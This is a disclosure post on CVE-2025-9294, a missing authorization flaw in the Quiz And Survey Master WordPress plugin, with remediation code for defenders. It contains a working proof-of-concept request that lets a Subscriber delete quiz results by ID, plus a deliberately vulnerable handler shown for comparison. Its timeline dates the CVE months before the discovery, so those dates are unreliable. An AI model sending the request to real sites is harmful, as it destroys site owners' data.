CVE-2025-9294 affects Quiz And Survey Master (QSM). It is a missing authorization vulnerability that allows a low-privilege authenticated user to delete quiz results they should never be able to touch. The issue is not about guessing passwords or bypassing login. It is about a server-side action that performs a destructive change while trusting that a generic nonce equals permission. On real sites QSM results are often business data: leads, assessments, training completions, exam attempts, customer feedback, or any workflow where results feed decisions and reporting. Because the plugin is widely deployed (50,000+ active installations), a site with many Subscriber accounts is a common scenario, which makes this a realistic integrity and availability problem rather than a purely theoretical one.
| Field | Value |
|---|---|
| CVE | CVE-2025-9294 |
| Plugin Version | Quiz And Survey Master <= 10.3.1 |
| All-time downloads | 3,108,304 |
| Active installations | 50,000+ |
| Publicly Published | January 5, 2025 |
| Last Updated | January 5, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9294 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next/quiz-and-survey-master-1031-missing-authorization-to-authenticated-subscriber-quiz-results-deletion |
Timeline
| Date | Event |
|---|---|
| August 13, 2025 | Plugin testing and vulnerability detection in QSM were completed |
| August 13, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 5, 2025 | Registered CVE-2025-9294 |
Discovery of the Vulnerability
The vulnerable surface is an AJAX endpoint reachable through wp-admin/admin-ajax.php. A POST request with action=qsm_dashboard_delete_result and a chosen result_id is sufficient to mark a result as deleted when paired with a nonce obtained in an authenticated context. The core flaw is that the handler does not enforce a capability check (for example current_user_can against an administrative capability) before managing results. Instead it relies only on the nonce, and a nonce is not an authorization mechanism: it proves request intent for someone who is already authorized, nothing more. With capability validation missing, any user who can obtain the nonce can perform the destructive operation, which is a direct privilege boundary bypass for result management.
Understanding IDOR attacks
A privileged WordPress AJAX action needs two independent checks. First, the server should verify the user is authorized for that action by checking capabilities and, where relevant, ownership or object-level rules. Second, the server should verify request authenticity using a nonce to prevent CSRF and accidental submission. CVE-2025-9294 breaks the first layer, which is the more important one. This is a common plugin mistake: developers treat nonces as security tokens. In reality a nonce can be exposed to any role that can load admin screens, through localized scripts or UI elements, and once a low-privilege user has it they can call endpoints directly. The real-world damage is not only lost historical quiz results. It can break compliance audits, destroy training evidence, erase customer survey history, or wipe lead generation trails. Because results are often the only record of a user completing a quiz, deletion becomes a form of business data sabotage rather than a cosmetic website issue.
Exploiting the Missing Authorization Vulnerability
To exploit CVE-2025-9294, an attacker needs only a Subscriber (or higher) session cookie and a nonce obtained from an authenticated page, then sends the following request once per result_id:
POC:
```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Cookie_of_Subscriber
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

action=qsm_dashboard_delete_result&result_id={number_from__to_99999}&nonce=nonce_from_profile.php____
```
The direct impact is integrity loss. Deleted results make analytics and reporting unreliable, and it becomes difficult to prove what happened, especially if the plugin uses soft-deletion flags rather than hard deletes, because the rows are hidden from staff yet still exist. A malicious user can selectively delete only their own failed attempts, delete a competitor's results in a training system, or remove survey feedback that reflects badly on a product. On sites where QSM is used for exams or certifications, attackers can erase evidence trails and create disputes that are expensive to resolve. There is also a denial-of-service angle: repeated deletions can keep the results view empty and disrupt normal operations for staff. The low privilege requirement matters because Subscriber accounts can be created at scale through registration, so the attacker does not need any special access. The most serious outcome is that a simple registered account becomes a tool for continuous data destruction against a core business feature.
Recommendations for Improved Security
The fix is to enforce proper authorization before any deletion occurs. The handler for qsm_dashboard_delete_result should require a strict capability such as manage_options, or a plugin-specific capability granted only to trusted administrative roles. It should confirm the current user is allowed to delete results at all and, if the feature is meant to be per-user, restrict deletion to results they own. The nonce should still be validated, but only as an additional CSRF layer after the capability check passes. The handler should also validate result_id as a positive integer, confirm the result exists before mutating it, and log the acting user ID together with the result_id so administrators can detect suspicious deletion patterns.

As an operational mitigation, site owners should reduce who can reach QSM admin dashboards, disable unnecessary registration flows, and monitor admin-ajax requests for repeated qsm_dashboard_delete_result actions so that abnormal bulk deletion attempts are detected quickly.
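The following is an added example, not QSM's own source: a hypothetical AJAX handler for the qsm_dashboard_delete_result action shown first in the nonce-only shape described above and then in a hardened shape that applies the recommendations (capability check before the nonce, integer validation of result_id, existence check, audit log). The nonce action name qsm_dashboard_nonce, the results table name and its deleted column, and the function names are assumptions made for illustration.

```php
<?php
// Added example, not code from the QSM plugin. Table name, column names,
// nonce action and function names are assumptions for illustration only.

// VULNERABLE PATTERN: the nonce is the only gate. Any logged-in user who can
// read the nonce from an admin screen or localized script passes this check,
// so a Subscriber can soft-delete arbitrary results.
function example_qsm_delete_result_vulnerable() {
    if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( $_POST['nonce'], 'qsm_dashboard_nonce' ) ) {
        wp_send_json_error( array( 'message' => 'Bad nonce' ), 403 );
    }
    global $wpdb;
    $result_id = intval( $_POST['result_id'] );
    // No current_user_can(), no existence check, no audit trail.
    $wpdb->update( $wpdb->prefix . 'mlw_results', array( 'deleted' => 1 ), array( 'result_id' => $result_id ) );
    wp_send_json_success();
}

// HARDENED PATTERN: authorization first, CSRF check second, then input
// validation, existence check, mutation and an audit log entry.
function example_qsm_delete_result_hardened() {
    // 1. Authorization. manage_options is used here; a plugin-specific
    //    capability granted only to trusted roles works the same way.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 2. CSRF protection. check_ajax_referer() dies on an invalid nonce; it
    //    proves intent only and is deliberately evaluated after step 1.
    check_ajax_referer( 'qsm_dashboard_nonce', 'nonce' );

    // 3. Input validation: result_id must be a positive integer.
    $result_id = isset( $_POST['result_id'] ) ? absint( $_POST['result_id'] ) : 0;
    if ( $result_id < 1 ) {
        wp_send_json_error( array( 'message' => 'Invalid result_id' ), 400 );
    }

    global $wpdb;
    $table = $wpdb->prefix . 'mlw_results'; // assumed table name

    // 4. Existence check before mutating, with a prepared statement.
    $exists = $wpdb->get_var(
        $wpdb->prepare( "SELECT result_id FROM {$table} WHERE result_id = %d AND deleted = 0", $result_id )
    );
    if ( null === $exists ) {
        wp_send_json_error( array( 'message' => 'Result not found' ), 404 );
    }

    // 5. Soft delete with explicit formats for the value and the WHERE clause.
    $updated = $wpdb->update(
        $table,
        array( 'deleted' => 1 ),
        array( 'result_id' => $result_id ),
        array( '%d' ),
        array( '%d' )
    );

    // 6. Audit trail: who deleted what, from which address.
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';
    error_log( sprintf( 'qsm: result %d deleted by user %d from %s', $result_id, get_current_user_id(), $ip ) );

    wp_send_json_success( array( 'result_id' => $result_id, 'updated' => (int) $updated ) );
}

// Only the hardened handler is registered; the vulnerable one is kept above
// for comparison.
add_action( 'wp_ajax_qsm_dashboard_delete_result', 'example_qsm_delete_result_hardened' );
```

The order matters: the capability check runs before the nonce check so that an unauthorized caller never learns whether their nonce was valid, and the existence check keeps the handler from reporting success for a result_id that was guessed from a loop over the ID space.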
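For the operational side, the following is an added example of a must-use plugin (not part of QSM or CleanTalk) that a site owner can drop into wp-content/mu-plugins/ as a virtual patch while waiting to update. It hooks the same wp_ajax action at priority 1, so it runs before the plugin's own callback, rejects callers without manage_options, and logs each attempt with a per-user counter so a loop over result_id values is visible as a burst from one account. The capability, the 10-minute window, the threshold of 20 and the alert hook name are assumptions to be tuned per site.

```php
<?php
/**
 * Plugin Name: QSM delete-result guard (added example, not part of QSM)
 * Description: Blocks and logs qsm_dashboard_delete_result for non-admins.
 *
 * Place in wp-content/mu-plugins/ so it loads before regular plugins.
 */

// Runs ahead of the plugin's handler because of priority 1. If the user is
// an administrator we return and let the plugin's callback proceed normally.
function example_qsm_guard_delete_result() {
    if ( current_user_can( 'manage_options' ) ) {
        return; // legitimate admin traffic continues to the plugin handler
    }

    $user_id   = get_current_user_id();
    $result_id = isset( $_POST['result_id'] ) ? absint( $_POST['result_id'] ) : 0;
    $ip        = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';

    // Count blocked attempts per user in a 10 minute window (assumed window).
    $key   = 'example_qsm_guard_' . $user_id;
    $count = (int) get_transient( $key ) + 1;
    set_transient( $key, $count, 10 * MINUTE_IN_SECONDS );

    // One log line per attempt; result_id and count make ID enumeration
    // easy to spot in the error log or a SIEM that ingests it.
    error_log( sprintf(
        'example_qsm_guard: blocked qsm_dashboard_delete_result user=%d result_id=%d ip=%s attempts_10m=%d',
        $user_id, $result_id, $ip, $count
    ) );

    // Threshold is an assumption; fire a hook that an alerting integration
    // can listen on when one account is clearly looping over result IDs.
    if ( $count >= 20 ) {
        do_action( 'example_qsm_guard_bulk_attempt', $user_id, $ip, $count );
    }

    // wp_send_json_error() calls wp_die(), so the plugin's handler never runs.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}
add_action( 'wp_ajax_qsm_dashboard_delete_result', 'example_qsm_guard_delete_result', 1 );
```

This is a stopgap, not a replacement for updating the plugin: it protects only the one action named on this page, and a future release may rename the action or add other result-management endpoints.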
By taking proactive measures to address IDOR and missing authorization issues like CVE-2025-9294, WordPress website owners can enhance their security posture and safeguard against exploitation. Stay vigilant, stay secure.
#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #HighVulnerability
Dmitrii I.
